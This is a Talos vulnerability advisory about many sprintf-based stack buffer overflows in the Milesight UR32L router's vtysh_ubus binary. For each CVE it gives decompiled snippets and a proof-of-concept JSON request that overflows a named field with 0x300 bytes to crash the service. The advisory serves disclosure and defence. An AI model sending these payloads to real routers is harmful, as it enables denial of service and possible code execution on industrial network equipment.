Lucene search

K
talosTalos IntelligenceTALOS-2023-1716
HistoryJul 06, 2023 - 12:00 a.m.

Milesight UR32L vtysh_ubus sprintf pattern buffer overflow vulnerabilities

2023-07-0600:00:00
Talos Intelligence
www.talosintelligence.com
9
milesight ur32l
vtysh_ubus
buffer overflow
http request
arbitrary code execution
high privileges
industrial cellular router
cve-2023-25081
firewall handler set
cwe-121

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

EPSS

0.001

Percentile

43.3%

Talos Vulnerability Report

TALOS-2023-1716

Milesight UR32L vtysh_ubus sprintf pattern buffer overflow vulnerabilities

July 6, 2023
CVE Number

CVE-2023-25091,CVE-2023-25107,CVE-2023-25113,CVE-2023-25120,CVE-2023-25122,CVE-2023-25082,CVE-2023-25095,CVE-2023-25117,CVE-2023-25121,CVE-2023-25115,CVE-2023-25118,CVE-2023-25124,CVE-2023-25101,CVE-2023-25123,CVE-2023-25102,CVE-2023-25084,CVE-2023-25093,CVE-2023-25097,CVE-2023-25103,CVE-2023-25096,CVE-2023-25090,CVE-2023-25085,CVE-2023-25106,CVE-2023-25104,CVE-2023-25086,CVE-2023-25088,CVE-2023-25105,CVE-2023-25112,CVE-2023-25089,CVE-2023-25098,CVE-2023-25081,CVE-2023-25094,CVE-2023-25100,CVE-2023-25110,CVE-2023-25109,CVE-2023-25099,CVE-2023-25119,CVE-2023-25083,CVE-2023-25087,CVE-2023-25116,CVE-2023-25092,CVE-2023-25108,CVE-2023-25111,CVE-2023-25114

SUMMARY

Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to arbitrary code execution. An attacker with high privileges can send HTTP requests to trigger these vulnerabilities.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight UR32L v32.3.0.5

PRODUCT URLS

UR32L - <https://www.milesight-iot.com/cellular/router/ur32l/&gt;

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-121 - Stack-based Buffer Overflow

DETAILS

The Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.

The Milesight router offers several functionalities through the /cgi endpoint. To call these functionalities, a POST request with the following template data is used:

{
    "id": &lt;number&gt;,
    "execute": &lt;number&gt;,
    "core": "&lt;core_name&gt;",
    "function": "&lt;functionality&gt;",
    "values": [
        {
           &lt;data&gt;
        }
    ]
}

Based on the value of the “core”, different classes of functionalities are reached. For instance, the yruo_vpn_openvpn_client “core” offers functions related to changing the OpenVPN client settings. All the functions, regardless of the “core” and “function”, use the blobmsg structures for parsing the received data.

Many of these functions have a common pattern:

is_equal = strcmp(table_key,&lt;key_value_one&gt;);
if (is_equal == 0) {
    command_argument_one = (char *)blobmsg_data(table_value);
}
else{
    is_equal = strcmp(table_key,"&lt;key_value_two&gt;");
    if (is_equal == 0) {
        command_argument_two = (char *)blobmsg_data(table_value);
    }
}
[...]
sprintf(vtysh_command_buff,command_format_string,command_argument_one,...);
exec_no_return_debug(vtysh_command_buff, callee_function_name, callee_function_line_number);
[...]

Essentially the common pattern for these functions is to have a loop where all the parameters are parsed from the blobmsg structures, and then a sprintf call is used to compose a command for another service. Finally, the composed command is passed to the exec_no_return_debug to actually execute the command.

A common vulnerable pattern in vtysh_ubus is the use of sprintf with user controllable data. This can lead to a buffer overflow. Following the vulnerable functions we found, the description of the single vulnerability is composed to show which are the blobmsg keys parsed that eventually will reach the vulnerable sprintf call.

Note that the following vulnerabilities require the requests to be sent by a high privileged user.

CVE-2023-25081 - firewall_handler_set - src, dmz

in the firewall_handler_set function the src and dmz JSON keys are used to fetch the respective values:

[...]
is_equal = strcmp(table_key,"src");
if (is_equal == 0) {
  src_string = blobmsg_get_string(table_value);
}
else {
  is_equal = strcmp(table_key,"dmz");
  if (is_equal == 0) {
    dmz_string = blobmsg_get_string(table_value);
  }
}
[...]

Eventually the following portion of code is reached:

[...]
sprintf(vtysh_command_buffer,"firewall dmz %s %s",src_string,dmz_string);
[...]

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_dmz",
            "index": 1,
            "value": {
                "src": "A"*0x300,
                "dmz": "POC"
            }
        }
    ]
}

CVE-2023-25082 - firewall_handler_set - old_ip, old_mac

in the firewall_handler_set function the old_mac and old_ip JSON keys are used to fetch the respective values:

[...]
else {
    is_equal = strcmp(table_key,"old_mac");
    if (is_equal == 0) {
        old_mac = (char *)blobmsg_get_string(table_value);
    }
    else {
        is_equal = strcmp(table_key,"old_ip");
        if (is_equal == 0) {
            old_ip = (char *)blobmsg_get_string(table_value);
        }
    }
    [...]
}

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"no firewall mac-binding %s %s",old_ip,old_mac);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_mac_binding",
            "index": 1,
            "value": {
                "old_ip": "A"*0x300,
                "old_mac": "POC"
            }
        }
    ]
}

CVE-2023-25083 - firewall_handler_set - ip, mac

in the firewall_handler_set function the ip and mac JSON keys are used to fetch the respective values:

[...]
is_equal = strcmp(table_key,"mac");
    if (is_equal == 0) {
        mac = (char *)blobmsg_get_string(table_value);
    }
    else {
        is_equal_ = strcmp(table_key,"ip");
        if (is_equal_ == 0) {
            ip = (char *)blobmsg_get_string(table_value);
        }
    }
[...]

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"firewall mac-binding %s %s",ip,mac);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_mac_binding",
            "index": 1,
            "value": {
                "ip": "A"*0x300,
                "mac": "POC"
            }
        }
    ]
}

CVE-2023-25084 - firewall_handler_set - ip, mac, description

in the firewall_handler_set function the ip, mac and description JSON keys are used to fetch the respective values:

is_equal = strcmp(table_key,"mac");
if (is_equal == 0) {
    mac = (char *)blobmsg_get_string(table_value);
}
else {
    is_equal_ = strcmp(table_key,"ip");
    if (is_equal_ == 0) {
        ip = (char *)blobmsg_get_string(table_value);
}
else {
    is_equal_ = strcmp(table_key,"description");
    if (is_equal_ == 0) {
        description = (char *)blobmsg_get_string(table_value);
  }
[...]

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"firewall mac-binding %s %s description %s",ip,mac,description);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_mac_binding",
            "index": 1,
            "value": {
                "description": "A"*0x300,
                "mac": "POC",
                "ip": "1212",
            }
        }
    ]
}

CVE-2023-25085 - firewall_handler_set - index, to_dst

in the firewall_handler_set function the index and to_dst JSON keys are used to fetch the respective values:

[...]
is_string = strcmp(table_key,"to_dst");
if (is_string == 0) {
    to_dst = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
    index = blobmsg_get_u32(table_value);
}
[...]

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit dip %s",index,to_dst);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_port_mapping",
            "index": 1,
            "value": {
                "to_dst": "A"*0x300,
                "index": 1,
            }
        }
    ]
}

CVE-2023-25086 - firewall_handler_set - index, dport

in the firewall_handler_set function the index and dport JSON keys are used to fetch the respective values:

[...]
is_string = strcmp(table_key,"dport");
if (is_string == 0) {
    dport = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
    index = blobmsg_get_u32(table_value);
}
[...]

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit dport %s",index,dport);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_port_mapping",
            "index": 1,
            "value": {
                "dport": "A"*0x300,
                "index": 1,
            }
        }
    ]
}

CVE-2023-25087 - firewall_handler_set - index, to_dport

in the firewall_handler_set function the index and to_dport JSON keys are used to fetch the respective values:

[...]
is_string = strcmp(table_key,"to_dport");
if (is_string == 0) {
    to_dport = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
    index = blobmsg_get_u32(table_value);
}
[...]

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit to-port %s",index,to_dport);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_port_mapping",
            "index": 1,
            "value": {
                "to_dport": "A"*0x300,
                "index": 1,
            }
        }
    ]
}

CVE-2023-25088 - firewall_handler_set - index, description

in the firewall_handler_set function the index and description JSON keys are used to fetch the respective values:

[...]
is_string = strcmp(table_key,"description");
if (is_string == 0) {
    description = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"index");
if (is_string == 0) {
    index = blobmsg_get_u32(table_value);
}
[...]

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"firewall port-mapping index %d edit description %s",index, description);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_port_mapping",
            "index": 1,
            "value": {
                "description": "A"*0x300,
                "index": 1,
            }
        }
    ]
}

CVE-2023-25089 - handle_interface_acl - interface. in_acl is -1

in the firewall_handler_set function the interface JSON key is used to fetch the respective value:

[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
    interface = (char *)blobmsg_get_string(table_value);
}
else {
    is_equal = strcmp(table_key,"in_acl");
    if (is_equal == 0) {
        in_acl = blobmsg_get_u32(table_value);
    }
[...]

This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:

if (in_acl != -2) {
    if (in_acl == -1) {
        [...]
        sprintf(vtysh_command_buffer,"no firewall-acl interface %s access-group in",interface);
        [...]
    }
    [...]
}

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_acl",
            "index": 1,
            "value": {
                "interface": "A"*0x300,
                "in_acl": -1,
            }
        }
    ]
}

CVE-2023-25090 - handle_interface_acl - interface, in_acl

in the firewall_handler_set function the interface and in_acl JSON keys are used to fetch the respective values:

[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
    interface = (char *)blobmsg_get_string(table_value);
}
else {
    is_equal = strcmp(table_key,"in_acl");
    if (is_equal == 0) {
        in_acl = (char *)blobmsg_get_u32(table_value);
    }
[...]

This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"firewall-acl interface %s access-group %d in",interface,in_acl);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_acl",
            "index": 1,
            "value": {
                "interface": "A"*0x300,
                "in_acl": 10,
            }
        }
    ]
}

CVE-2023-25091 - handle_interface_acl - interface. out_acl is -1

in the firewall_handler_set function the interface JSON key is used to fetch its respective value:

[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
    interface = (char *)blobmsg_get_string(table_value);
}
[...]
is_equal = strcmp(table_key,"out_acl");
if (is_equal == 0) {
    out_acl = (char *)blobmsg_get_u32(table_value);
}
[...]

This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:

if (out_acl != -2) {
    if (out_acl == -1) {
        [...]
        sprintf(vtysh_command_buffer,"no firewall-acl interface %s access-group out",interface);
        [...]
    }
    [...]
}

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_acl",
            "index": 1,
            "value": {
                "interface": "A"*0x300,
                "out_acl":-1,
            }
        }
    ]
}

CVE-2023-25092 - handle_interface_acl - interface, out_acl

in the firewall_handler_set function the interface and out_acl JSON keys are used to fetch the respective values:

[...]
is_equal = strcmp(table_key,"interface");
if (is_equal == 0) {
    interface = (char *)blobmsg_get_string(table_value);
}
[...]
is_equal = strcmp(table_key,"out_acl");
if (is_equal == 0) {
    out_acl = (char *)blobmsg_get_u32(table_value);
}
[...]

This function will then call the handle_interface_acl function. Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"firewall-acl interface %s access-group %d out",interface, out_acl);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_firewall_mac_binding",
    "function": "set",
    "values": [
        {
            "base": "yruo_firewall_acl",
            "index": 1,
            "value": {
                "interface": "A"*0x300,
                "out_acl":10,
            }
        }
    ]
}

CVE-2023-25093 - set_qos - class_name

the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function. In the set_qos the class_name JSON key is used to fetch its respective value:

is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
	class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
	action = blobmsg_get_u32(table_value);
}
[...]
if (action != -1 && class_name != (char *)0x0) {
    if (action == 3) {
        if (is_upload == 0) {
			command_format_string = "no traffic download class %s";
		}
		else {
			command_format_string = "no traffic upload class %s";
		}
		[...]

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,command_format_string,class_name);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_qos_download",
    "function": "set",
    "values": [
        {
            "base": "yruo_qos_upload",
            "index": 1,
            "value": {
                "class_list":[{
                    "class_name":'A'*0x300,
                    "action":3,
                }]
            }
        }
    ]
}

CVE-2023-25094 - into_class_node - class_name/old_class_name

the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function. The set_qos function will call the into_class_node function. Eventually the following portion of code is reached:

if (is_upload == 0) {
	command_format_string = "no traffic download class %s";
  	}
  	else {
	command_format_string = "no traffic upload class %s";
  	}
  	sprintf(vtysh_command_buffer,command_format_string + 3,class_name);

The into_class_node function is called with two possible value:

if (action != -1 && class_name != (char *)0x0) {
    if (action == 3) {
        [...]
}
else {
    if ((old_class_name == (char *)0x0) || (*old_class_name == '\0')) {
        into_class_node(is_upload,class_name);
    }
    else {
        into_class_node(is_upload,old_class_name);
    [...]
    }
    [...]
}

In the set_qos the class_name and the old_class_name JSON keys are used to fetch its respective values:

is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
	class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"old_class_name");
if (is_string == 0) {
	old_class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(current_table_key,"action");
if (is_string == 0) {
	action = blobmsg_get_u32(table_value);
}
[...]

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_qos_download",
    "function": "set",
    "values": [
        {
            "base": "yruo_qos_upload",
            "index": 1,
            "value": {
                "class_list":[{
                    "class_name":'A'*0x300,
                    "action":2,
                }]
            }
        }
    ]
}

CVE-2023-25095 - set_qos - rule_name. negated command

the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function. In the set_qos function the rule_name JSON key is used to fetch its respective value:

is_string = strcmp(table_key,"rule_name");
if (is_string == 0) {
	rule_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
	action = blobmsg_get_u32(table_value);
}
[...]
if (is_upload == 0) {
	command_format_string = "no traffic download rule %s";
}
else {
	command_format_string = "no traffic upload rule %s";
}

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,command_format_string,rule_name);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_qos_download",
    "function": "set",
    "values": [
        {
            "base": "yruo_qos_upload",
            "index": 1,
            "value": {
                "rule_list":[{
                    "rule_name":'A'*0x300,
                    "action":3,
                }]
            }
        }
    ]
}

CVE-2023-25096 - set_qos - rule_name

the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function. In the set_qos function the rule_name JSON key is used to fetch its respective value:

is_string = strcmp(table_key,"rule_name");
if (is_string == 0) {
	rule_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
	action = blobmsg_get_u32(table_value);
}
[...]
if (is_upload == 0) {
	command_format_string = "no traffic download rule %s";
}
else {
	command_format_string = "no traffic upload rule %s";
}

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,command_format_string + 3,rule_name);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_qos_download",
    "function": "set",
    "values": [
        {
            "base": "yruo_qos_upload",
            "index": 1,
            "value": {
                "rule_list":[{
                    "rule_name":'A'*0x300,
                    "action":2,
                }]
            }
        }
    ]
}

CVE-2023-25097 - set_qos - attach_class

the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function. In the set_qos function the attach_class JSON key is used to fetch its respective value:

is_string = strcmp(table_key,"attach_class");
if (is_string == 0) {
	attach_class = blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
	class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
	action = blobmsg_get_u32(table_value);
}
[...]

Eventually the following portion of code is reached:

if ((action != -1 && rule_name != (char *)0x0) && (*rule_name != '\0')) {
    if (action == 3) {
        [...]
    }
    else {
        [...]
        if (attach_class != 0) {
            sprintf(vtysh_command_buffer,"match class %s",attach_class);
            exec_cmd_no_return_debug(vtysh_command_buffer,"qos_ubus.c");
        }
        [...]

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_qos_download",
    "function": "set",
    "values": [
        {
            "base": "yruo_qos_upload",
            "index": 1,
            "value": {
                "rule_list":[{
                    "attach_class":'A'*0x300,
                    'rule_name':'A',
                    "action":2,
                }]
            }
        }
    ]
}

CVE-2023-25098 - set_qos - source

the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function. In the set_qos function the source JSON key is used to fetch its respective value:

[...]
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
	class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
	action = blobmsg_get_u32(table_value);
}
[...]
is_string = strcmp(table_key,"source");
if (is_string == 0) {
	source = (char *)blobmsg_get_string(table_value);
}
[...]

Eventually the following portion of code is reached:

if ((action != -1 && rule_name != (char *)0x0) && (*rule_name != '\0')) {
    if (action == 3) {
        [...]
    }
    else {
        [...]
        if (source != 0) {
            if (*source == 0) {
                [...]
            }
            else{
                sprintf(vtysh_command_buffer,"match source %s",source);
            }
            [...]
        }

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_qos_download",
    "function": "set",
    "values": [
        {
            "base": "yruo_qos_upload",
            "index": 1,
            "value": {
                "rule_list":[{
                    'rule_name':'A',
                    'source':'A'*0x300,
                    "action":2,
                }]
            }
        }
    ]
}

CVE-2023-25099 - set_qos - dest

the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function. In the set_qos function the dest JSON key is used to fetch its respective value:

[...]
is_string = strcmp(table_key,"class_name");
if (is_string == 0) {
	class_name = (char *)blobmsg_get_string(table_value);
}
[...]
is_string = strcmp(table_key,"action");
if (is_string == 0) {
	action = blobmsg_get_u32(table_value);
}
[...]
is_string = strcmp(table_key,"dest");
if (is_string == 0) {
	dest = (char *)blobmsg_get_string(table_value);
}
[...]

Eventually the following portion of code is reached:

if ((action != -1 && rule_name != (char *)0x0) && (*rule_name != '\0')) {
    if (action == 3) {
        [...]
    }
    else {
        [...]
        if (dest != 0) {
            if (*dest == 0) {
                [...]
            }
            else{
                sprintf(vtysh_command_buffer,"match destination %s",dest);
            }
            [...]
        }

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_qos_download",
    "function": "set",
    "values": [
        {
            "base": "yruo_qos_upload",
            "index": 1,
            "value": {
                "rule_list":[{
                    'rule_name':'A',
                    'dest':'A'*0x300,
                    "action":2,
                }]
            }
        }
    ]
}

CVE-2023-25100 - set_qos - default_class

the qos_handler_set function is the entry point for one of the functionality. This function will eventually call the set_qos function. In the set_qos function the default_class JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"rule_list");
if (((is_equal != 0) &&
        (is_equal = strcmp(table_key,"class_list"), is_equal != 0)) &&
     (is_equal = strcmp(table_key,"default_class"), is_equal == 0)) {
    default_class = blobmsg_get_string(table_value);
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"default-class %s",default_class);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 9,
    "execute": 1,
    "core": "yruo_qos_download",
    "function": "set",
    "values": [
        {
            "base": "yruo_qos_upload",
            "index": 1,
            "value": {
                "default_class":"A"*0x300
            }
        }
    ]
}

CVE-2023-25101 - set_dmvpn - gre_key

the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_dmvpn function. In the set_qos function the gre_key JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"gre_key");
if (is_equal == 0) {
    gre_key = (char *)blobmsg_get_string(table_value);
    if (*gre_key != '\0') {
        command_format_string = "tunnel key %s";
        [...]
    } Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,command_format_string,gre_key);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 6,
    "execute": 1,
    "core": "yruo_vpn_dmvpn",
    "function": "set",
    "values": [
        {
            "base": "yruo_vpn_dmvpn",
            "index": 1,
            "value": {
                "gre_key":"A"*0x300
            }
        }
    ]
}

CVE-2023-25102 - set_dmvpn - hub_ip, hub_gre_ip

the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_dmvpn function. In the set_dmvpn function the hub_ip and the hub_gre_ip JSON keys are used to fetch its respective values:

is_equal = strcmp(table_key,"hub_ip");
if (is_equal == 0) {
	hub_ip = (char *)blobmsg_get_string(table_value);
}
else {
	is_equal = strcmp(table_key,"hub_gre_ip");
	if (is_equal == 0) {
		hub_gre_ip = (char *)blobmsg_get_string(table_value);
	} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"ip nhrp map %s %s",hub_ip,hub_gre_ip);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 6,
	"execute": 1,
	"core": "yruo_vpn_dmvpn",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_dmvpn",
			"index": 1,
			"value": {
				"hub_ip":"A"*0x300,
				"hub_gre_ip":"POC"
			}
		}
	]
}

CVE-2023-25103 - set_dmvpn - gre_ip, gre_mask

the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_dmvpn function. In the set_dmvpn function the gre_ip and the gre_mask JSON keys are used to fetch its respective values:

is_equal = strcmp(table_key,"gre_ip");
if (is_equal == 0) {
	gre_ip = (char *)blobmsg_get_string(table_value);
}
else {
	is_equal = strcmp(table_key,"gre_mask");
	if (is_equal == 0) {
		gre_mask = (char *)blobmsg_get_string(table_value);
	} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"ip address %s %s",gre_ip,gre_mask);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 6,
	"execute": 1,
	"core": "yruo_vpn_dmvpn",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_dmvpn",
			"index": 1,
			"value": {
				"gre_ip":"A"*0x300,
				"gre_mask":"POC"
			}
		}
	]
}

CVE-2023-25104 - set_ike_profile - username, password

the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_ike_profile function. In the set_ike_profile function the username and the password JSON keys are used to fetch its respective values:

is_equal = strcmp(table_key,"username");
if (is_equal == 0) {
	username = (char *)blobmsg_get_string(table_value);
}
else {
	is_equal = strcmp(table_key,"password");
	if (is_equal == 0) {
	password = (char *)blobmsg_get_string(table_value);
	}
} Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"xauth username %s password %s",username,password);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
    "id": 6,
    "execute": 1,
    "core": "yruo_vpn_dmvpn",
    "function": "set",
    "values": [
        {
            "base": "yruo_vpn_dmvpn",
            "index": 1,
            "value": {
                "username":"A"*0x300,
                "password":"POC"
            }
        }
    ]
}

CVE-2023-25105 - set_ike_profile - secrets_remote

the vpn_dmvpn_handler_set function is the entry point for one of the functionality. This function will eventually call the set_ike_profile function. In the set_ike_profile function the secrets_remote JSON key is used to fetch its respective value:

is_equal = strcmp(table_key,"secrets_remote");
if (is_equal == 0) {
        if(version != 1){
            command_argument = blobmsg_get_string(table_value);
            command_format_string = "pre-shared-key remote %s";
            [...]
        }
    }

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,command_format_string,command_argument);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 7,
	"execute": 1,
	"core": "yruo_vpn_ipsec_client",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_ipsec_client",
			"index": 1,
			"value": {
				"secrets_remote": "A"*0x300,
				"version": 2,
			}
		}
	]
}

CVE-2023-25106 - set_gre - local_virtual_ip, local_virtual_mask

the vpn_gre_handler_set function is the entry point for one of the functionality. This function will eventually call the set_gre function. In the set_gre function the local_virtual_ip and the local_virtual_mask JSON keys are used to fetch its respective values:

is_equal = strcmp(table_key,"local_virtual_ip");
if (is_equal == 0) {
    local_virtual_ip = (char *)blobmsg_get_string(table_value);
    [...]
}
is_equal = strcmp(table_key,"local_virtual_mask");
if (is_equal == 0) {
    local_virtual_mask = (char *)blobmsg_get_string(table_value);
    [...]
}

Eventually the following portion of code is reached:

sprintf(vtysh_command_buffer,"ip address local %s %s",local_virtual_ip,local_virtual_mask);

This can lead to a buffer overflow in the vtysh_command_buffer buffer.

Exploit Proof of Concept

The following is an example of a JSON data that will cause the vtysh_ubus binary to crash:

{
	"id": 9,
	"execute": 1,
	"core": "yruo_vpn_gre",
	"function": "set",
	"values": [
		{
			"base": "yruo_vpn_gre",
			"index": 1,
			"value": {
				"local_virtual_ip": "A"*0x300,
				"local_virtual_mask": "POC",
			}
		}
	]
}

